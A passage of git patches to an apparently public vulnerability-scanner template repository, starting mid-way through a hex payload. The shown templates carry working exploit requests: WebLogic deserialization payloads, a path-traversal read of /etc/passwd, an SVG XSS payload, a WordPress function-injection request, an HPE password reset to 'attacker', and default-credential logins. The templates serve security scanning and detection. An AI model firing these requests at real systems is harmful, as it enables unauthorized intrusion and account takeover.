5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078" + type: hex + read: 1024 + - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" + type: hex + read: 1024 + - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" + type: hex + read: 1024 + host: + - "{{Hostname}}" + matchers: + - type: word + part: raw + words: + - "StreamMessageImpl cannot be cast to weblogic" From 95b34330ed8f9ad6a8908d4d03568468c66f5b0d Mon Sep 17 00:00:00 2001 From: Keith Date: Fri, 25 Jun 2021 03:41:02 +0800 Subject: [PATCH 0073/4083] Add CVE-2018-2893.yaml - Oracle WebLogic Server Deserialization RCE --- cves/2018/CVE-2018-2893.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-2893.yaml b/cves/2018/CVE-2018-2893.yaml index 077f244662..888becc02f 100644 --- a/cves/2018/CVE-2018-2893.yaml +++ b/cves/2018/CVE-2018-2893.yaml @@ -17,7 +17,7 @@ network: - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" type: hex read: 1024 - - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" + - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" type: hex read: 1024 host: From 9cb25ef2f4855f85ef982ded33c614938d3e78e8 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 25 Jun 2021 07:46:32 +0900 Subject: [PATCH 0074/4083] Create CVE-2018-16299.yaml --- CVE-2018-16299.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 CVE-2018-16299.yaml diff --git a/CVE-2018-16299.yaml b/CVE-2018-16299.yaml new file mode 100644 index 0000000000..a23f767b1a --- /dev/null +++ b/CVE-2018-16299.yaml @@ -0,0 +1,24 @@ +id: cve-2018-16299 + +info: + name: WordPress Plugin Localize My Post 1.0 - LFI + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/45439 + tags: wordpress,cve2018,cves,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 3e79b41904b05d95b098c8ba458557a05d7f76e3 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Fri, 25 Jun 2021 13:54:26 +0900 Subject: [PATCH 0075/4083] Create sonicwall-email-security-detect.yaml Signed-off-by: GwanYeong Kim --- .../sonicwall-email-security-detect.yaml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 technologies/sonicwall-email-security-detect.yaml diff --git a/technologies/sonicwall-email-security-detect.yaml b/technologies/sonicwall-email-security-detect.yaml new file mode 100644 index 0000000000..eb57bc826e --- /dev/null +++ b/technologies/sonicwall-email-security-detect.yaml @@ -0,0 +1,20 @@ +id: sonicwall-email-security-detect + +info: + name: SonicWall Email Security Detection + author: gy741 + severity: info + reference: | + - https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html + - https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/ + tags: tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/pics/branding/favicon.ico" + + matchers: + - type: dsl + dsl: + - "status_code==200 && (\"2063459123\" == mmh3(base64_py(body)))" From d1e4b5c5101197e7d8cabfbc422d3c52487ca124 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 25 Jun 2021 10:51:00 +0530 Subject: [PATCH 0076/4083] minor updates --- cves/2020/CVE-2020-3580.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-3580.yaml b/cves/2020/CVE-2020-3580.yaml index e0b40aa1e4..141cb2910f 100644 --- a/cves/2020/CVE-2020-3580.yaml +++ b/cves/2020/CVE-2020-3580.yaml @@ -9,7 +9,7 @@ info: - https://twitter.com/ptswarm/status/1408050644460650502 description: | Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. - tags: xss,cve,cve2020,cisco + tags: cve,cve2020,xss,cisco requests: - raw: @@ -19,15 +19,20 @@ requests: Content-Type: application/x-www-form-urlencoded Content-Length: 44 - SAMLResponse="> + SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E matchers-condition: and matchers: - type: word words: - - '">' + - '' part: body - type: status status: - 200 + + - type: word + part: header + words: + - "text/html" \ No newline at end of file From fca70dd2c7ac811cc717791d0b02e32b266789e6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 25 Jun 2021 12:43:55 +0530 Subject: [PATCH 0077/4083] Update and rename CVE-2018-16299.yaml to cves/2018/CVE-2018-16299.yaml --- CVE-2018-16299.yaml => cves/2018/CVE-2018-16299.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename CVE-2018-16299.yaml => cves/2018/CVE-2018-16299.yaml (96%) diff --git a/CVE-2018-16299.yaml b/cves/2018/CVE-2018-16299.yaml similarity index 96% rename from CVE-2018-16299.yaml rename to cves/2018/CVE-2018-16299.yaml index a23f767b1a..ff1d032a9f 100644 --- a/CVE-2018-16299.yaml +++ b/cves/2018/CVE-2018-16299.yaml @@ -1,4 +1,4 @@ -id: cve-2018-16299 +id: CVE-2018-16299 info: name: WordPress Plugin Localize My Post 1.0 - LFI From dd9845111095b2222a8b8b5835dea95d0bd8812a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 25 Jun 2021 12:45:04 +0530 Subject: [PATCH 0078/4083] Update CVE-2018-16299.yaml --- cves/2018/CVE-2018-16299.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-16299.yaml b/cves/2018/CVE-2018-16299.yaml index ff1d032a9f..5741f9b96f 100644 --- a/cves/2018/CVE-2018-16299.yaml +++ b/cves/2018/CVE-2018-16299.yaml @@ -5,7 +5,7 @@ info: author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/45439 - tags: wordpress,cve2018,cves,lfi + tags: wordpress,cve2018,cve,lfi requests: - method: GET From e49278fbd32bc1d05229509c9914067634bdb54a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 25 Jun 2021 07:16:42 +0000 Subject: [PATCH 0079/4083] Auto Update README [Fri Jun 25 07:16:42 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 142b015819..4a3f0f1b63 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 360 | vulnerabilities | 198 | exposed-panels | 154 | +| cves | 361 | vulnerabilities | 198 | exposed-panels | 154 | | takeovers | 68 | exposures | 107 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 25 | | default-logins | 31 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**119 directories, 1345 files**. +**119 directories, 1346 files**. From 2d40d9071567ca98feefc299ca975ec81de715b2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 25 Jun 2021 12:53:22 +0530 Subject: [PATCH 0080/4083] Update CVE-2021-21234.yaml --- cves/2021/CVE-2021-21234.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21234.yaml b/cves/2021/CVE-2021-21234.yaml index 8d2832668a..35982b8a6c 100644 --- a/cves/2021/CVE-2021-21234.yaml +++ b/cves/2021/CVE-2021-21234.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: high reference: https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234 - tags: cve,cve2021,lfi + tags: cve,cve2021,springboot,lfi requests: - method: GET From 10a27f139d7118fba836ed102254b62f433d78e4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 25 Jun 2021 13:52:27 +0530 Subject: [PATCH 0081/4083] Create plastic-scm-login.yaml --- exposed-panels/plastic-scm-login.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/plastic-scm-login.yaml diff --git a/exposed-panels/plastic-scm-login.yaml b/exposed-panels/plastic-scm-login.yaml new file mode 100644 index 0000000000..9efc84cc89 --- /dev/null +++ b/exposed-panels/plastic-scm-login.yaml @@ -0,0 +1,22 @@ +id: plastic-scm-login + +info: + name: Plastic SCM Login + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Log+in+-+Plastic+SCM%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/account' + + matchers-condition: and + matchers: + - type: word + words: + - 'Log in - Plastic SCM' + - type: status + status: + - 200 From 4f3dcad1a5b1bbf5371fa83682aa91e7c31a040d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 25 Jun 2021 11:10:46 +0000 Subject: [PATCH 0082/4083] Auto Update README [Fri Jun 25 11:10:46 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4a3f0f1b63..c8e63f458f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 361 | vulnerabilities | 198 | exposed-panels | 154 | +| cves | 361 | vulnerabilities | 198 | exposed-panels | 155 | | takeovers | 68 | exposures | 107 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 25 | | default-logins | 31 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**119 directories, 1346 files**. +**119 directories, 1347 files**. From afacc21204e68fc058d43f05003f4cfd05ee7209 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 25 Jun 2021 11:20:52 +0000 Subject: [PATCH 0083/4083] Auto Update README [Fri Jun 25 11:20:52 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c8e63f458f..af4554ff8f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 361 | vulnerabilities | 198 | exposed-panels | 155 | +| cves | 362 | vulnerabilities | 198 | exposed-panels | 155 | | takeovers | 68 | exposures | 107 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 25 | | default-logins | 31 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**119 directories, 1347 files**. +**119 directories, 1348 files**. From 59e24ab8a7ece3fc87fbeeb56c066a1dbb7612f5 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Sat, 26 Jun 2021 13:38:26 +0530 Subject: [PATCH 0084/4083] Create multiple-theme-ssrf.yaml --- .../wordpress/multiple-theme-ssrf.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 vulnerabilities/wordpress/multiple-theme-ssrf.yaml diff --git a/vulnerabilities/wordpress/multiple-theme-ssrf.yaml b/vulnerabilities/wordpress/multiple-theme-ssrf.yaml new file mode 100644 index 0000000000..ddc5a6a584 --- /dev/null +++ b/vulnerabilities/wordpress/multiple-theme-ssrf.yaml @@ -0,0 +1,30 @@ +id: multiple-theme-ssrf +info: + name: Multiple Themes - Unauthenticated Function Injection + author: madrobot + severity: high + tags: wordpress,rce,ssrf + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Content-Length: 158 + Connection: close + + action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com + + matchers-condition: and + matchers: + - type: word + words: + - "Example Domain" + - "protocol_version" + part: body + - type: status + status: + - 200 From cb5c53aef3b06f14e83ad479d8d7f97fd3ba5260 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Sat, 26 Jun 2021 13:40:30 +0530 Subject: [PATCH 0085/4083] Create CVE-2021-29203.yaml --- cves/2021/CVE-2021-29203.yaml | 47 +++++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 cves/2021/CVE-2021-29203.yaml diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml new file mode 100644 index 0000000000..12120d1eda --- /dev/null +++ b/cves/2021/CVE-2021-29203.yaml @@ -0,0 +1,47 @@ +id: CVE-2021-29203 +info: + name: HPE Edgeline Infrastructure Manager v1.21 Authentication Bypass + author: madrobot + severity: critical + tags: hpe,cve,cve2021,bypass + reference: https://www.tenable.com/security/research/tra-2021-15 + +requests: + - raw: + - | + PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Accept: */* + Content-Length: 23 + Content-Type: application/json + Connection: close + + {"Password":"attacker"} + - | + POST /redfish/v1/SessionService/Sessions/ HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Content-Length: 50 + Content-Type: application/json + Connection: close + + {"UserName":"Administrator","Password":"attacker"} + + matchers-condition: and + matchers: + - type: status + status: + - 201 + - type: word + words: + - "X-Auth-Token" + - "PasswordReset" + - "Location" + part: header + - type: word + words: + - "MessageID" + - "ExtendedInfo" + part: body + condition: and From 00b2d39c402dfb80e9219371dc5a6419e45ec114 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Sat, 26 Jun 2021 13:42:00 +0530 Subject: [PATCH 0086/4083] Create IBM-Default-Creds.yaml --- default-logins/ibm/IBM-Default-Creds.yaml | 34 +++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 default-logins/ibm/IBM-Default-Creds.yaml diff --git a/default-logins/ibm/IBM-Default-Creds.yaml b/default-logins/ibm/IBM-Default-Creds.yaml new file mode 100644 index 0000000000..3de1643ded --- /dev/null +++ b/default-logins/ibm/IBM-Default-Creds.yaml @@ -0,0 +1,34 @@ +id: IBM-Default-Creds + +info: + name: IBM Storage Management default creds + author: madrobot + severity: medium + +requests: + - raw: + - | + POST /0/Authenticate HTTP/1.1 + Host: {{Hostname}} + Origin: http://{{Hostname}} + Content-Length: 62 + Content-Type: application/x-www-form-urlencoded + Connection: close + + j_username=admin&j_password=admin&continue=&submit=submit+form + + matchers-condition: and + matchers: + - type: word + words: + - "/0/Console" + - "Property of IBM" + condition: and + part: body + - type: word + words: + - "JSESSIONID" + part: header + - type: status + status: + - 200 From 9d7fe960314cb290706825576a86ff993677bcd9 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Sat, 26 Jun 2021 13:43:03 +0530 Subject: [PATCH 0087/4083] Create Spectracom.yaml --- default-logins/spectracom/Spectracom.yaml | 29 +++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 default-logins/spectracom/Spectracom.yaml diff --git a/default-logins/spectracom/Spectracom.yaml b/default-logins/spectracom/Spectracom.yaml new file mode 100644 index 0000000000..66bd5a58a0 --- /dev/null +++ b/default-logins/spectracom/Spectracom.yaml @@ -0,0 +1,29 @@ +id: Spectracom +info: + name: Spectracom Default creds + author: madrobot + severity: medium + tags: creds + +requests: + - raw: + - | + POST /users/login HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Content-Type: application/x-www-form-urlencoded + Content-Length: 98 + Connection: close + + data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123 + + matchers-condition: and + matchers: + - type: word + words: + - "spectracom" + - "deleted" + part: header + - type: status + status: + - 302 From 24a3fab9d3ffd6230de21142e4370786c7884d7c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 26 Jun 2021 19:35:52 +0530 Subject: [PATCH 0088/4083] Added missing condition --- vulnerabilities/other/maian-cart-preauth-rce.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/maian-cart-preauth-rce.yaml b/vulnerabilities/other/maian-cart-preauth-rce.yaml index 3290e2d7fd..813e0fdde0 100644 --- a/vulnerabilities/other/maian-cart-preauth-rce.yaml +++ b/vulnerabilities/other/maian-cart-preauth-rce.yaml @@ -56,4 +56,5 @@ requests: - type: dsl dsl: - 'contains(body_3, "{{randstr_1}}")' - - "status_code_3 == 200" \ No newline at end of file + - "status_code_3 == 200" + condition: and \ No newline at end of file From 2a7d45fa1f6af24f2f4b24a6b2b42faea2d7600e Mon 